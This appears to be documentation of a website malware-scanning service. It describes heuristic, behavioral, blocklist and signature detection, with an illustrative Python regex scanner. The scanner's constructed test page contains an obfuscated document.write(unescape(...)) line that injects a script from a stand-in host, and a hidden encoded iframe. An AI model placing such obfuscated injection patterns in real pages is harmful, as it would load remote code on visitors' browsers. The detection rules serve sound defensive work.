We use several complementary methods to detect malware. Each is a different way of identifying malicious content, and the methods are described below.
Heuristic analysis identifies source-code patterns typically used in malicious attacks. The heuristic scan runs in the first phase of the malware scan and uses signature rules.
Using heuristic analysis, the service can identify:
- Encoded JavaScript. URL-encoded JavaScript used to obfuscate the script's real content.
- document.write calls with obfuscation. The document.write method dynamically generates content in the browser; malware authors wrap it in obfuscation functions to disguise what is being written.
- Vulnerable control instantiation. Attempts to instantiate a control that has known vulnerabilities.
- Character encoding inside inline frames. Iframes load an external source inside the current window; malicious software often encodes this content to obfuscate what it is doing.
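As an added illustration (this is example code, not the service's own signature rules), the scanner below applies simplified versions of three of the heuristics above to a constructed HTML sample: a percent-encoded argument to unescape(), a document.write fed directly by a decoding function, and an iframe whose source URL is percent-encoded. The thresholds (6 and 3 encoded bytes) and the sample page are assumptions chosen for the demo.

```python
import re
from urllib.parse import unquote

# Constructed sample page (not real malware): an obfuscated document.write,
# a percent-encoded iframe source, and a benign link with one encoded space.
SAMPLE_HTML = """<html><body>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2Fexample.invalid%2Fx.js%22%3E%3C%2Fscript%3E'));</script>
<iframe src="http://example.invalid/%70%61%67%65.html" width="0" height="0"></iframe>
<p>Benign text with a <a href="https://example.com/page?q=a%20b">link</a>.</p>
</body></html>"""

PCT = r"%[0-9A-Fa-f]{2}"  # one URL-encoded byte

# Illustrative heuristic rules (assumption: thresholds chosen for this demo).
RULES = {
    # unescape('...') whose argument carries at least 6 encoded bytes
    "encoded_javascript": re.compile(
        r"unescape\s*\(\s*['\"](?:[^'\"]*?" + PCT + r"){6,}", re.I),
    # document.write fed directly by a decoding/obfuscation function
    "obfuscated_document_write": re.compile(
        r"document\.write\s*\(\s*(?:unescape|eval|String\.fromCharCode|atob)\s*\(", re.I),
    # <iframe src=...> with at least 3 encoded bytes in its source URL
    "encoded_iframe": re.compile(
        r"<iframe\b[^>]*\bsrc\s*=\s*['\"]?(?:[^'\"\s>]*?" + PCT + r"){3,}", re.I),
}

# Argument of unescape('...'), so the hidden markup can be decoded and inspected.
UNESCAPE_ARG = re.compile(r"unescape\s*\(\s*['\"]([^'\"]*)['\"]", re.I)


def scan_page(html):
    """Return (rule_name, line_number, matched_text) for every rule hit."""
    hits = []
    for line_no, line in enumerate(html.splitlines(), 1):
        for name, pattern in RULES.items():
            match = pattern.search(line)
            if match:
                hits.append((name, line_no, match.group(0)[:60]))
    return hits


def decode_unescape_payloads(html):
    """Decode each unescape('...') argument to reveal the markup it generates."""
    return [unquote(m.group(1)) for m in UNESCAPE_ARG.finditer(html)]


if __name__ == "__main__":
    for hit in scan_page(SAMPLE_HTML):
        print("%-26s line %d: %s" % hit)
    for payload in decode_unescape_payloads(SAMPLE_HTML):
        print("decoded document.write:", payload)
```

The benign link line is deliberately not flagged: a single encoded space outside an iframe or unescape() call falls below both thresholds, which is the kind of false-positive control a real rule set needs.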
Behavioral analysis identifies malware based on a web site's behavior. The service visits the site with a deliberately unpatched, vulnerable browser and operating system and runs tests on that machine to determine whether the site behaves outside normal operating guidelines; the unpatched machine is monitored to verify whether suspicious behavior has occurred.
Using behavioral analysis, the service can identify:
- Microsoft Windows registry keys being written
- Rogue processes being started
- Programs being installed and started
- Unexpected files being written to disk
Crawled pages, referenced URLs, and remotely loaded resources are checked against public exclude lists (blocklists) of known-malicious domains and content.
Downloaded scripts, files, and binaries are scanned with traditional anti-virus signatures to identify additional malicious programs.